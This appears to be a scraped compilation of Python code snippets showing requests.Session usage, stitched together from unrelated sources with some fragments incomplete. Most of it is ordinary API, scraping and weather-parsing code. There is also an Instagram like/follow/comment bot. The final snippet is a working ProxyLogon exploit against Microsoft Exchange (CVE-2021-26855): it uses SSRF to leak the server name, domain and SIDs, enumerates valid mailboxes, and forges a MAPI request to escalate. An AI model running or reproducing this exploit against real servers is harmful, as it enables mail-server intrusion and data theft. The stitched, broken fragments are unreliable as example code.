def __init__(self, logger=None):
    self.logger = logger or logging.getLogger(__name__)
    self.refresh_period = 45 * 60  # minutes * seconds
    self.last_authenticated = None
    self.session = requests.Session()
import os
import requests

god_session = requests.Session()
god_session.headers.update({
    'Authorization': 'bearer ' + os.environ['SWAPPR_TANDA_GOD_TOKEN'],
    'Content-Type': 'application/json'
})


def get(path):
    return god_session.get('https://my.tanda.co/api/v2/' + path)


def put(path, data=None):
    return god_session.put('https://my.tanda.co/api/v2/' + path, data=data)
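
A minimal usage sketch for the get/put helpers above; the 'users' and 'shifts/12345' paths and the payload are illustrative assumptions, not endpoints confirmed by this snippet:

import json

# Fetch a collection through the pre-authorised session.
response = get('users')
response.raise_for_status()
users = response.json()
print(len(users), 'users')

# The session sends a JSON Content-Type header, so serialise dict payloads
# before passing them as `data`.
update = put('shifts/12345', data=json.dumps({'notes': 'swapped'}))
print(update.status_code)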
Example #3
    def get_verifier(self, request_token=None, wp_user=None, wp_pass=None):
        """ pretends to be a browser, uses the authorize auth link, submits user creds to WP login form to get
        verifier string from access token """

        if request_token is None:
            request_token = self.request_token
        assert request_token, "need a valid request_token for this step"

        if wp_user is None and self.wp_user:
            wp_user = self.wp_user
        if wp_pass is None and self.wp_pass:
            wp_pass = self.wp_pass

        authorize_url = self.authentication['oauth1']['authorize']
        authorize_url = UrlUtils.add_query(authorize_url, 'oauth_token', request_token)

        # we're using a different session from the usual API calls
        # (I think the headers are incompatible?)

        # self.requester.get(authorize_url)
        authorize_session = requests.Session()

        login_form_response = authorize_session.get(authorize_url)
        login_form_params = {
            'username': wp_user,
            'password': wp_pass,
            'token': request_token
        }
        try:
            login_form_action, login_form_data = self.get_form_info(login_form_response, 'loginform')
        except AssertionError as exc:
            self.parse_login_form_error(
                login_form_response, exc, **login_form_params
            )

        for name, values in login_form_data.items():
            if name == 'log':
                login_form_data[name] = wp_user
            elif name == 'pwd':
                login_form_data[name] = wp_pass
            else:
                login_form_data[name] = values[0]

        assert 'log' in login_form_data, 'input for user login did not appear on form'
        assert 'pwd' in login_form_data, 'input for user password did not appear on form'

        # print "submitting login form to %s : %s" % (login_form_action, str(login_form_data))

        confirmation_response = authorize_session.post(login_form_action, data=login_form_data, allow_redirects=True)
        try:
            authorize_form_action, authorize_form_data = self.get_form_info(confirmation_response, 'oauth1_authorize_form')
        except AssertionError as exc:
            self.parse_login_form_error(
                confirmation_response, exc, **login_form_params
            )

        for name, values in authorize_form_data.items():
            if name == 'wp-submit':
                assert \
                    'authorize' in values, \
                    "apparently no authorize button, only %s" % str(values)
                authorize_form_data[name] = 'authorize'
            else:
                authorize_form_data[name] = values[0]

        assert 'wp-submit' in authorize_form_data, 'authorize button did not appear on form'

        final_response = authorize_session.post(authorize_form_action, data=authorize_form_data, allow_redirects=False)

        assert \
            final_response.status_code == 302, \
            "was not redirected by authorize screen, was %d instead. something went wrong" \
                % final_response.status_code
        assert 'location' in final_response.headers, "redirect did not provide redirect location in header"

        final_location = final_response.headers['location']

        # At this point we can choose to follow the redirect if the user wants,
        # or just parse the verifier out of the redirect URL.
        # Open to suggestions if anyone has any :)

        final_location_queries = parse_qs(urlparse(final_location).query)

        assert \
            'oauth_verifier' in final_location_queries, \
            "oauth verifier not provided in final redirect: %s" % final_location

        self._oauth_verifier = final_location_queries['oauth_verifier'][0]
        return self._oauth_verifier
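
The verifier returned above is the piece that gets exchanged, together with the request token, for an access token. A generic sketch of that final OAuth1 step using requests_oauthlib; the consumer keys, token values and access URL are placeholders, and this library is an assumption rather than the class's own follow-up code:

from requests_oauthlib import OAuth1Session

# Placeholder credentials; real values come from the OAuth1 discovery data
# and from the get_verifier() call above.
oauth = OAuth1Session(
    client_key='consumer_key',
    client_secret='consumer_secret',
    resource_owner_key='request_token',
    resource_owner_secret='request_token_secret',
    verifier='oauth_verifier',
)
access = oauth.fetch_access_token('https://example.com/oauth1/access')
print(access['oauth_token'], access['oauth_token_secret'])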
def open_website():
    with requests.Session() as session:
        for website in list1:
            print(fetch(session, website))
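
open_website() above assumes a module-level list1 of URLs and a fetch(session, url) helper defined elsewhere; a minimal sketch of what those might look like (both names and the behaviour are assumptions):

import requests

# Hypothetical inputs; the original module supplies its own.
list1 = [
    'https://example.com',
    'https://example.org',
]

def fetch(session, website):
    # Reuse the shared Session so connections are pooled across requests.
    response = session.get(website, timeout=10)
    return '{} -> {}'.format(website, response.status_code)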
Example #5
class EasyHttp(object):
    __session = requests.Session()

    @staticmethod
    def get_session():
        return EasyHttp.__session

    @staticmethod
    def load_cookies(cookie_path):
        load_cookiejar = cookiejar.LWPCookieJar()
        load_cookiejar.load(cookie_path,
                            ignore_discard=True,
                            ignore_expires=True)
        load_cookies = requests.utils.dict_from_cookiejar(load_cookiejar)
        EasyHttp.__session.cookies = requests.utils.cookiejar_from_dict(
            load_cookies)

    @staticmethod
    def save_cookies(cookie_path):
        new_cookie_jar = cookiejar.LWPCookieJar(cookie_path)
        requests.utils.cookiejar_from_dict(
            {c.name: c.value
             for c in EasyHttp.__session.cookies}, new_cookie_jar)
        new_cookie_jar.save(cookie_path,
                            ignore_discard=True,
                            ignore_expires=True)

    @staticmethod
    def updateHeaders(headers):
        EasyHttp.__session.headers.update(headers)

    @staticmethod
    def resetHeaders():
        EasyHttp.__session.headers.clear()
        EasyHttp.__session.headers.update({
            'User-Agent':
            random.choice(USER_AGENT),
        })

    @staticmethod
    def setCookies(**kwargs):
        for k, v in kwargs.items():
            EasyHttp.__session.cookies.set(k, v)

    @staticmethod
    def removeCookies(key=None):
        EasyHttp.__session.cookies.set(
            key, None) if key else EasyHttp.__session.cookies.clear()

    @staticmethod
    @sendLogic
    def send(urlInfo, params=None, data=None, **kwargs):
        EasyHttp.resetHeaders()
        if 'headers' in urlInfo and urlInfo['headers']:
            EasyHttp.updateHeaders(urlInfo['headers'])
        try:
            if len(ips) == 0:
                response = EasyHttp.__session.request(method=urlInfo['method'],
                                                      url=urlInfo['url'],
                                                      params=params,
                                                      data=data,
                                                      timeout=10,
                                                      allow_redirects=False,
                                                      **kwargs)
            else:
                response = EasyHttp.__session.request(
                    method=urlInfo['method'],
                    url=urlInfo['url'],
                    params=params,
                    data=data,
                    # Note: under Python 3, writing proxies as {"https": "https://{}"} failed to connect,
                    # so only an http proxy is configured here.
                    proxies={
                        "http": "http://{}".format(random.choice(ips)[0])
                    },
                    timeout=10,
                    allow_redirects=False,
                    **kwargs)
            if response.status_code == requests.codes.ok:
                if 'response' in urlInfo:
                    if urlInfo['response'] == 'binary':
                        return response.content
                    if urlInfo['response'] == 'html':
                        response.encoding = response.apparent_encoding
                        return response.text
                return response.json()
        except Exception:
            pass
        return None

    @staticmethod
    @sendLogic
    def getHtmlTree(url, **kwargs):
        """
        获取html树
        """
        time.sleep(1)
        headers = {
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch',
            'Accept-Language': 'zh-CN,zh;q=0.8',
        }
        try:
            response = EasyHttp.__session.request(
                method='GET',
                url=url,
                # headers=headers,
                timeout=10,
                allow_redirects=False,
                **kwargs)
            if response.status_code == requests.codes.ok:
                return html.etree.HTML(response.text)
        except Exception as e:
            return None
        return None

    @staticmethod
    @sendLogic
    def get(url, timeout):
        try:
            response = EasyHttp.__session.request(method='GET',
                                                  url=url,
                                                  timeout=timeout,
                                                  allow_redirects=False)
            if response.status_code == requests.codes.ok:
                return response.text
        except Exception as e:
            return None
        return None

    @staticmethod
    @sendLogic
    def get_custom(urlInfo):
        try:
            response = EasyHttp.__session.request(method=urlInfo['method'],
                                                  url=urlInfo['url'],
                                                  timeout=10,
                                                  allow_redirects=False)
        except Exception as e:
            return None
        return response

    @staticmethod
    @sendLogic
    def post_custom(urlInfo, data=None):
        EasyHttp.resetHeaders()
        if 'headers' in urlInfo and urlInfo['headers']:
            EasyHttp.updateHeaders(urlInfo['headers'])
        try:
            if len(ips) == 0:
                response = EasyHttp.__session.request(method=urlInfo['method'],
                                                      url=urlInfo['url'],
                                                      data=data,
                                                      timeout=10,
                                                      allow_redirects=False)
            else:
                response = EasyHttp.__session.request(
                    method=urlInfo['method'],
                    url=urlInfo['url'],
                    data=data,
                    proxies={
                        "http": "http://{}".format(random.choice(ips)[0])
                    },
                    timeout=10,
                    allow_redirects=False)
        except Exception as e:
            return None
        return response
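
A usage sketch for EasyHttp.send(); the urlInfo keys (method, url, headers, response) mirror what send() reads above, while the endpoint itself is an assumption:

# Hypothetical endpoint; 'response': 'html' makes send() return decoded text.
url_info = {
    'method': 'GET',
    'url': 'https://example.com/latest',
    'headers': {'Referer': 'https://example.com/'},
    'response': 'html',
}

page = EasyHttp.send(url_info, params={'page': 1})
if page is None:
    print('request failed, was redirected, or returned a non-200 status')
else:
    print(page[:200])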
Example #6
# Fetch the Daum Shopping best-100 ranking

# https://shoppinghow.kakao.com/siso/p/api/bestRank/dispprodbest?vCateId=GMP&durationDays=30&count=100&_=1614242561449
# print only product_name
import requests

url = "https://shoppinghow.kakao.com/siso/p/api/bestRank/dispprodbest?vCateId=GMP&durationDays=30&count=100&_=1614242561449"


with requests.Session() as s:
    r = s.get(url)

    for i, item in enumerate(r.json(), 1):  # enumerate from 1 so items print with their rank
        if i < 101:
            print(i, item["product_name"])

    # for i, row in r.json():
    #     for k,v in row.items():
    #         print("key : {}, value : {}".format(k,v))
    #     print()
Example #7
    def __init__(self,
                 login,
                 password,
                 like_per_day=1000,
                 media_max_like=50,
                 media_min_like=0,
                 follow_per_day=0,
                 follow_time=5 * 60 * 60,
                 unfollow_per_day=0,
                 start_at_h=0,
                 start_at_m=0,
                 end_at_h=23,
                 end_at_m=59,
                 database_name='follows_db.db',
                 comment_list=[["this", "the", "your"],
                               ["photo", "picture", "pic", "shot", "snapshot"],
                               ["is", "looks", "feels", "is really"],
                               ["great", "super", "good", "very good", "good",
                                "wow", "WOW", "cool", "GREAT", "magnificent",
                                "magical", "very cool", "stylish", "beautiful",
                                "so beautiful", "so stylish", "so professional",
                                "lovely", "so lovely", "very lovely", "glorious",
                                "so glorious", "very glorious", "adorable",
                                "excellent", "amazing"],
                               [".", "..", "...", "!", "!!", "!!!"]],
                 comments_per_day=0,
                 tag_list=['cat', 'car', 'dog'],
                 max_like_for_one_tag=5,
                 unfollow_break_min=15,
                 unfollow_break_max=30,
                 log_mod=0,
                 proxy="",
                 user_blacklist={},
                 tag_blacklist=[],
                 unwanted_username_list=[],
                 unfollow_whitelist=[]):

        self.database_name = database_name
        self.follows_db = sqlite3.connect(database_name, timeout=0, isolation_level=None)
        self.follows_db_c = self.follows_db.cursor()
        check_and_update(self)
        fake_ua = UserAgent()
        self.user_agent = check_and_insert_user_agent(self, str(fake_ua.random))
        self.bot_start = datetime.datetime.now()
        self.start_at_h = start_at_h
        self.start_at_m = start_at_m
        self.end_at_h = end_at_h
        self.end_at_m = end_at_m
        self.unfollow_break_min = unfollow_break_min
        self.unfollow_break_max = unfollow_break_max
        self.user_blacklist = user_blacklist
        self.tag_blacklist = tag_blacklist
        self.unfollow_whitelist = unfollow_whitelist
        self.comment_list = comment_list

        self.time_in_day = 24 * 60 * 60
        # Like
        self.like_per_day = like_per_day
        if self.like_per_day != 0:
            self.like_delay = self.time_in_day / self.like_per_day

        # Follow
        self.follow_time = follow_time
        self.follow_per_day = follow_per_day
        if self.follow_per_day != 0:
            self.follow_delay = self.time_in_day / self.follow_per_day

        # Unfollow
        self.unfollow_per_day = unfollow_per_day
        if self.unfollow_per_day != 0:
            self.unfollow_delay = self.time_in_day / self.unfollow_per_day

        # Comment
        self.comments_per_day = comments_per_day
        if self.comments_per_day != 0:
            self.comments_delay = self.time_in_day / self.comments_per_day

        # Don't like if media has more than n likes.
        self.media_max_like = media_max_like
        # Don't like if media has less than n likes.
        self.media_min_like = media_min_like
        # Auto mod settings:
        # Default list of tags.
        self.tag_list = tag_list
        # Pick a random tag from tag_list and like it 1 to n times.
        self.max_like_for_one_tag = max_like_for_one_tag
        # log_mod: 0 logs to console, 1 logs to file
        self.log_mod = log_mod
        self.s = requests.Session()
        # If you need a proxy, set something like this:
        # self.s.proxies = {"https": "http://proxyip:proxyport"}
        # by @ageorgios
        if proxy != "":
            proxies = {
                'http': 'http://' + proxy,
                'https': 'http://' + proxy,
            }
            self.s.proxies.update(proxies)
        # convert login to lower
        self.user_login = login.lower()
        self.user_password = password
        self.bot_mode = 0
        self.media_by_tag = []
        self.media_on_feed = []
        self.media_by_user = []
        self.unwanted_username_list = unwanted_username_list
        now_time = datetime.datetime.now()
        log_string = 'Instabot v1.2.0 started at %s:\n' % \
                     (now_time.strftime("%d.%m.%Y %H:%M"))
        self.write_log(log_string)
        self.login()
        self.populate_user_blacklist()
        signal.signal(signal.SIGTERM, self.cleanup)
        atexit.register(self.cleanup)
def get_session():
    if not hasattr(thread_local, "session"):
        thread_local.session = requests.Session()
    return thread_local.session
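
A sketch of how the thread-local helper above is typically driven from a thread pool so each worker reuses its own pooled Session; the thread_local object and the URLs are assumptions added to make the sketch self-contained:

import threading
from concurrent.futures import ThreadPoolExecutor

import requests

thread_local = threading.local()  # the module-level object get_session() relies on

def get_session():
    if not hasattr(thread_local, "session"):
        thread_local.session = requests.Session()
    return thread_local.session

def check(url):
    # Each worker thread lazily creates, then reuses, its own Session.
    session = get_session()
    response = session.get(url, timeout=10)
    return url, response.status_code

urls = ['https://example.com', 'https://example.org']
with ThreadPoolExecutor(max_workers=2) as pool:
    for url, status in pool.map(check, urls):
        print(url, status)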
Example #9
    def __init__(self, api_key: str, host: str = 'http://localhost:5000'):
        self.api_key = api_key
        self.host = host

        self.s = requests.Session()
        self.s.headers.update({"Authorization": f"Key {api_key}"})
Example #10
    def __init__(self):

        self.S = requests.Session()
Example #11
    def __init__(self,
                 web_interface_url,
                 user_pwd,
                 svn_branch='trunk',
                 svn_revision='HEAD',
                 thread_count=1,
                 result_poll_interval=2,
                 user_agent=None,
                 version=None):
        """
        Creates a new WebInterface object.
        The given svn revision is resolved (e.g. 'HEAD' -> 17495).
        @param web_interface_url: the base URL of the VerifierCloud's web interface
        @param user_pwd: user name and password in the format '<user_name>:<password>', or None if no authentication is required
        @param svn_branch: the svn branch name or 'trunk', defaults to 'trunk'
        @param svn_revision: the svn revision number or 'HEAD', defaults to 'HEAD'
        @param thread_count: the number of threads for fetching results in parallel
        @param result_poll_interval: the number of seconds to wait between polling results
        """
        if not (1 <= thread_count <= MAX_SUBMISSION_THREADS):
            sys.exit(
                "Invalid number {} of client threads, needs to be between 1 and {}."
                .format(thread_count, MAX_SUBMISSION_THREADS))
        if not 1 <= result_poll_interval:
            sys.exit("Poll interval {} is too small, needs to be at least 1s.".
                     format(result_poll_interval))
        if not web_interface_url[-1] == '/':
            web_interface_url += '/'

        default_headers = {'Connection': 'Keep-Alive'}
        if user_agent:
            default_headers['User-Agent'] = \
                '{}/{} (Python/{} {}/{})'.format(user_agent, version, platform.python_version(), platform.system(), platform.release())

        urllib.parse.urlparse(web_interface_url)  # sanity check
        self._web_interface_url = web_interface_url
        logging.info('Using VerifierCloud at %s', web_interface_url)

        self._connection = requests.Session()
        self._connection.headers.update(default_headers)
        self._connection.verify = '/etc/ssl/certs'
        if user_pwd:
            self._connection.auth = (user_pwd.split(":")[0],
                                     user_pwd.split(":")[1])
            self._base64_user_pwd = base64.b64encode(
                user_pwd.encode("utf-8")).decode("utf-8")
        else:
            self._base64_user_pwd = None

        self._unfinished_runs = {}
        self._unfinished_runs_lock = threading.Lock()
        self._downloading_result_futures = {}
        self._download_attempts = {}
        self.thread_count = thread_count
        self._executor = ThreadPoolExecutor(thread_count)
        self._thread_local = threading.local()
        self._hash_code_cache = {}
        self._group_id = str(random.randint(0, 1000000))
        self._read_hash_code_cache()
        self._resolved_tool_revision(svn_branch, svn_revision)
        self._tool_name = self._request_tool_name()

        try:
            self._result_downloader = SseResultDownloader(
                self, result_poll_interval)
        except Exception:
            self._result_downloader = PollingResultDownloader(
                self, result_poll_interval)
    def process_data(self):
        station_id = None
        try:
            self.log.info('Processing Thunerwetter data...')

            date_pattern = re.compile(r'am (?P<date>.*?) um (?P<time>.*?) Uhr')
            wind_pattern = re.compile(
                r'(?P<wind_speed>[0-9]{1,3}\.[0-9]) km/h / '
                r'(?P<wind_dir>[A-Z]{1,2}(-[A-Z]{1,2})?)')
            wind_directions = {
                'N': 0,
                'N-NO': 1 * (360 / 16),
                'NO': 2 * (360 / 16),
                'O-NO': 3 * (360 / 16),
                'O': 4 * (360 / 16),
                'O-SO': 5 * (360 / 16),
                'SO': 6 * (360 / 16),
                'S-SO': 7 * (360 / 16),
                'S': 8 * (360 / 16),
                'S-SW': 9 * (360 / 16),
                'SW': 10 * (360 / 16),
                'W-SW': 11 * (360 / 16),
                'W': 12 * (360 / 16),
                'W-NW': 13 * (360 / 16),
                'NW': 14 * (360 / 16),
                'N-NW': 15 * (360 / 16),
            }
            temp_pattern = re.compile(r'(?P<temp>[-+]?[0-9]{1,3}\.[0-9]) °C')
            humidity_pattern = re.compile(r'(?P<humidity>[0-9]{1,3}) %')

            thun_tz = tz.gettz('Europe/Zurich')

            session = requests.Session()
            session.headers.update(user_agents.chrome)

            wind_tree = html.fromstring(
                session.get(self.provider_url,
                            timeout=(self.connect_timeout,
                                     self.read_timeout)).text)

            # Date
            date_element = wind_tree.xpath(
                '//td[text()[contains(.,"Messwerte von Thun")]]')[0]
            date_text = date_element.text.strip()
            date = date_pattern.search(date_text).groupdict()

            station = self.save_station('westquartier',
                                        'Thun Westquartier',
                                        'Thun Westquartier',
                                        float(46.7536663),
                                        float(7.6211841),
                                        StationStatus.GREEN,
                                        url=self.provider_url)
            station_id = station['_id']

            key = arrow.get(
                f'{date["date"]} {date["time"]}',
                'DD.MM.YYYY HH:mm').replace(tzinfo=thun_tz).timestamp

            measures_collection = self.measures_collection(station_id)
            new_measures = []

            if not self.has_measure(measures_collection, key):
                wind_elements = wind_tree.xpath('//td[text()="Ø 10 Minuten"]')

                # Wind average
                wind_avg_text = wind_elements[0].xpath(
                    'following-sibling::td')[0].text.strip()
                wind_avg = wind_pattern.search(wind_avg_text).groupdict()

                # Wind max
                wind_max_text = wind_elements[1].xpath(
                    'following-sibling::td')[0].text.strip()
                wind_max = wind_pattern.search(wind_max_text).groupdict()

                air_tree = html.fromstring(
                    session.get(self.provider_url_temp,
                                timeout=(self.connect_timeout,
                                         self.read_timeout)).text)

                # Date
                date_element = air_tree.xpath(
                    '//td[text()[contains(.,"Messwerte von Thun")]]')[0]
                date_text = date_element.text.strip()
                date = date_pattern.search(date_text).groupdict()
                air_date = arrow.get(
                    f'{date["date"]} {date["time"]}',
                    'DD.MM.YYYY HH:mm').replace(tzinfo=thun_tz).timestamp

                if air_date != key:
                    raise ProviderException(
                        'Wind and air dates are not matching')

                air_elements = air_tree.xpath('//td[text()="aktuell"]')

                # Temperature
                temp_text = air_elements[0].xpath(
                    'following-sibling::td')[0].text.strip()
                temp = temp_pattern.search(temp_text).groupdict()

                # Humidity
                humidity_text = air_elements[1].xpath(
                    'following-sibling::td')[0].text.strip()
                humidity = humidity_pattern.search(humidity_text).groupdict()

                measure = self.create_measure(
                    station,
                    key,
                    wind_directions[wind_avg['wind_dir']],
                    wind_avg['wind_speed'],
                    wind_max['wind_speed'],
                    temperature=temp['temp'],
                    humidity=humidity['humidity'])
                new_measures.append(measure)

            self.insert_new_measures(measures_collection, station,
                                     new_measures)

        except ProviderException as e:
            self.log.warning(
                f"Error while processing station '{station_id}': {e}")
        except Exception as e:
            self.log.exception(
                f"Error while processing station '{station_id}': {e}")

        self.log.info('...Done!')
Example #13
    def __init__(self, host='localhost', port=GETH_DEFAULT_RPC_PORT, tls=False):
        self.host = host
        self.port = port
        self.tls = tls
        self.session = requests.Session()
        self.session.mount(self.host, HTTPAdapter(max_retries=MAX_RETRIES))
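
A hedged sketch of how a retrying session like this might issue a JSON-RPC call against a local geth node; the port, URL and eth_blockNumber call follow standard Ethereum JSON-RPC usage but are assumptions here, since the class's own request method is not shown:

import requests
from requests.adapters import HTTPAdapter

session = requests.Session()
session.mount('http://', HTTPAdapter(max_retries=3))

payload = {
    'jsonrpc': '2.0',
    'method': 'eth_blockNumber',  # standard Ethereum JSON-RPC method
    'params': [],
    'id': 1,
}
response = session.post('http://localhost:8545', json=payload, timeout=10)
print(response.json().get('result'))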
    def process_data(self):
        station_id = None
        try:
            self.log.info("Processing Thunerwetter data...")

            date_pattern = re.compile(r"am (?P<date>.*?) um (?P<time>.*?) Uhr")
            wind_pattern = re.compile(
                r"(?P<wind_speed>[0-9]{1,3}\.[0-9]) km/h / " r"(?P<wind_dir>[A-Z]{1,2}(-[A-Z]{1,2})?)"
            )
            wind_directions = {
                "N": 0,
                "N-NO": 1 * (360 / 16),
                "NO": 2 * (360 / 16),
                "O-NO": 3 * (360 / 16),
                "O": 4 * (360 / 16),
                "O-SO": 5 * (360 / 16),
                "SO": 6 * (360 / 16),
                "S-SO": 7 * (360 / 16),
                "S": 8 * (360 / 16),
                "S-SW": 9 * (360 / 16),
                "SW": 10 * (360 / 16),
                "W-SW": 11 * (360 / 16),
                "W": 12 * (360 / 16),
                "W-NW": 13 * (360 / 16),
                "NW": 14 * (360 / 16),
                "N-NW": 15 * (360 / 16),
            }
            temp_pattern = re.compile(r"(?P<temp>[-+]?[0-9]{1,3}\.[0-9]) °C")
            humidity_pattern = re.compile(r"(?P<humidity>[0-9]{1,3}) %")

            thun_tz = tz.gettz("Europe/Zurich")

            session = requests.Session()
            session.headers.update(user_agents.chrome)

            wind_tree = html.fromstring(
                session.get(self.provider_url, timeout=(self.connect_timeout, self.read_timeout)).text
            )

            # Date
            date_element = wind_tree.xpath('//td[text()[contains(.,"Messwerte von Thun")]]')[0]
            date_text = date_element.text.strip()
            date = date_pattern.search(date_text).groupdict()

            station = self.save_station(
                "westquartier",
                "Thun Westquartier",
                "Thun Westquartier",
                float(46.7536663),
                float(7.6211841),
                StationStatus.GREEN,
                url=self.provider_url,
            )
            station_id = station["_id"]

            key = arrow.get(f'{date["date"]} {date["time"]}', "DD.MM.YYYY HH:mm").replace(tzinfo=thun_tz).int_timestamp

            measures_collection = self.measures_collection(station_id)
            new_measures = []

            if not self.has_measure(measures_collection, key):
                wind_elements = wind_tree.xpath('//td[text()="Ø 10 Minuten"]')

                # Wind average
                wind_avg_text = wind_elements[0].xpath("following-sibling::td")[0].text.strip()
                wind_avg = wind_pattern.search(wind_avg_text).groupdict()

                # Wind max
                wind_max_text = wind_elements[1].xpath("following-sibling::td")[0].text.strip()
                wind_max = wind_pattern.search(wind_max_text).groupdict()

                air_tree = html.fromstring(
                    session.get(self.provider_url_temp, timeout=(self.connect_timeout, self.read_timeout)).text
                )

                # Date
                date_element = air_tree.xpath('//td[text()[contains(.,"Messwerte von Thun")]]')[0]
                date_text = date_element.text.strip()
                date = date_pattern.search(date_text).groupdict()
                air_date = (
                    arrow.get(f'{date["date"]} {date["time"]}', "DD.MM.YYYY HH:mm")
                    .replace(tzinfo=thun_tz)
                    .int_timestamp
                )

                if air_date != key:
                    raise ProviderException("Wind and air dates are not matching")

                air_elements = air_tree.xpath('//td[text()="aktuell"]')

                # Temperature
                temp_text = air_elements[0].xpath("following-sibling::td")[0].text.strip()
                temp = temp_pattern.search(temp_text).groupdict()

                # Humidity
                humidity_text = air_elements[1].xpath("following-sibling::td")[0].text.strip()
                humidity = humidity_pattern.search(humidity_text).groupdict()

                measure = self.create_measure(
                    station,
                    key,
                    wind_directions[wind_avg["wind_dir"]],
                    wind_avg["wind_speed"],
                    wind_max["wind_speed"],
                    temperature=temp["temp"],
                    humidity=humidity["humidity"],
                )
                new_measures.append(measure)

            self.insert_new_measures(measures_collection, station, new_measures)

        except ProviderException as e:
            self.log.warning(f"Error while processing station '{station_id}': {e}")
        except Exception as e:
            self.log.exception(f"Error while processing station '{station_id}': {e}")

        self.log.info("...Done!")
def exploit(url):
    try:
        print('[*] Target: %s' % url)
        server = url + '/owa/auth.owa'
        s = requests.Session()
        req = s.post(server, verify=False)
        if not req.status_code == 400:
            print("[-] Can't get FQDN!")
            exit(0)
        server_name = req.headers["X-FEServer"]
        print('(*) Getting FQDN Name: %s' % (server_name))
        path_maybe_vuln = '/ecp/ssrf.js'
        headers = {
            'User-Agent': 'Hello-World',
            'Cookie': 'X-BEResource={FQDN}/EWS/Exchange.asmx?a=~1942062522;'.format(FQDN=server_name),
            'Connection': 'close',
            'Content-Type': 'text/xml',
            'Accept-Encoding': 'gzip'
        }
        payload = """<?xml version="1.0" encoding="utf-8"?>
					<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
					xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
					xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
					xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
					    <soap:Body>
					        <m:GetFolder>
					            <m:FolderShape>
					                <t:BaseShape>Default</t:BaseShape>
					            </m:FolderShape>
					            <m:FolderIds>
					                <t:DistinguishedFolderId Id="inbox">
					                    <t:Mailbox>
					                        <t:EmailAddress>[email protected]</t:EmailAddress>
					                    </t:Mailbox>
					                </t:DistinguishedFolderId>
					            </m:FolderIds>
					        </m:GetFolder>
					    </soap:Body>
					</soap:Envelope>
		"""
        reqs = s.post('%s/%s' % (url, path_maybe_vuln),
                      headers=headers,
                      data=payload,
                      verify=False)
        if reqs.status_code == 200:
            print('(+) Target is Vuln to SSRF [CVE-2021-26855]!')
            print('(*) Getting Information Server')
            print('(+) Computer Name = %s' % reqs.headers["X-DiagInfo"])
            print('(+) Domain Name = %s' %
                  reqs.headers["X-CalculatedBETarget"].split(',')[1])
            print('(+) Guest SID = %s' % reqs.headers["Set-Cookie"].split(
                'X-BackEndCookie=')[1].split(';')[0])
            print('(*) Find valid mail from users list')
            u_m = reqs.headers["X-CalculatedBETarget"].split(',')[1]
            f = open('users.txt').read().splitlines()
            print('+ %s' % reqs.headers["X-CalculatedBETarget"].split(',')[1])
            X = input('(+) Put Domain Server without Subdomain: ')
            for u in f:
                domainstr = tldextract.extract(u_m)
                domain = "{}.{}".format(domainstr.domain, domainstr.suffix)
                user = u
                if ('local' in u_m):
                    domain = '%s.local' % reqs.headers[
                        "X-CalculatedBETarget"].split(',')[1].split('.')[1]
                elif X == '':
                    #	else:
                    domainstr = tldextract.extract(u_m)
                    domain = "{}.{}".format(domainstr.domain, domainstr.suffix)
                else:
                    domain = X
                mail_valid = '{user}@{domain}'.format(user=user, domain=domain)
                headers_for_discover = {
                    "User-Agent": "Hello-World",
                    "Cookie": "X-BEResource=Admin@{FQDN}:444/autodiscover/autodiscover.xml?a=~1942062522;".format(FQDN=server_name),
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1",
                    "Content-Type": "text/xml"
                }
                autodiscover_payload = '''
				<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
			    <Request>
			      <EMailAddress>{mail}</EMailAddress>
			      <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
			    </Request>
			</Autodiscover>
				'''.format(mail=mail_valid)
                r3q = s.post('%s/%s' % (url, path_maybe_vuln),
                             headers=headers_for_discover,
                             data=autodiscover_payload,
                             verify=False)
                #print(r3q.text)
                if 'DisplayName' in r3q.text:
                    print('-' * 35)
                    print('(+) %s | Valid Mail!' % (mail_valid))
                    txtstr = """%s""" % (r3q.text)
                    display_name = re.findall(
                        '(?:<DisplayName>)(.+?)(?:</DisplayName>)', txtstr)
                    legacyDN = re.findall('(?:<LegacyDN>)(.+?)(?:</LegacyDN>)',
                                          txtstr)
                    server = r3q.text.split('<Server>')[1].split(
                        '</Server>')[0]
                    #oabId = ''
                    # try:
                    # 	oabId = atreq.text.split('/oab/')[1].split('/')[0]
                    # except:
                    # 	pass
                    print('(+) Server = %s' % server)
                    groupname = re.findall(
                        '(?:<GroupingInformation>)(.+?)(?:</GroupingInformation>)',
                        txtstr)
                    mapi_body = legacyDN[
                        0] + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
                    mapireq = requests.post(
                        "%s/%s" % (url, path_maybe_vuln),
                        headers={
                            "Cookie":
                            "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=%s&a=~1942062522;"
                            % (server_name, server),
                            "Content-Type":
                            "application/mapi-http",
                            "X-Requesttype":
                            "Connect",
                            "X-Clientinfo":
                            "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
                            "X-Clientapplication":
                            "Outlook/15.0.4815.1002",
                            "X-Requestid":
                            "{C715155F-2BE8-44E0-BD34-2960067874C8}:500",
                            "User-Agent":
                            "Hello-World"
                        },
                        data=mapi_body,
                        verify=False)
                    try:
                        if mapireq.status_code != 200 or "act as owner of a UserMailbox" not in mapireq.text:
                            exit(0)
                        else:
                            sid = mapireq.text.split("with SID ")[1].split(
                                " and MasterAccountSid")[0]
                    except IndexError:
                        exit(0)
                    print('(*) Tested ProxyLogon!')
                    proxylogon(url, mail_valid, server_name, sid)
                    exit(0)
                else:
                    #print(r3q.text)
                    #xmessage = r3q.text.split('<Message>')[1].split('<Message>')[0]
                    print('(-) %s | Invalid mail' % (mail_valid))
            exit(0)
        else:
            print('(-) Target is not Vuln to SSRF [CVE-2021-26855]!')
    #except Exception as e:
    #print(e)
    #pass
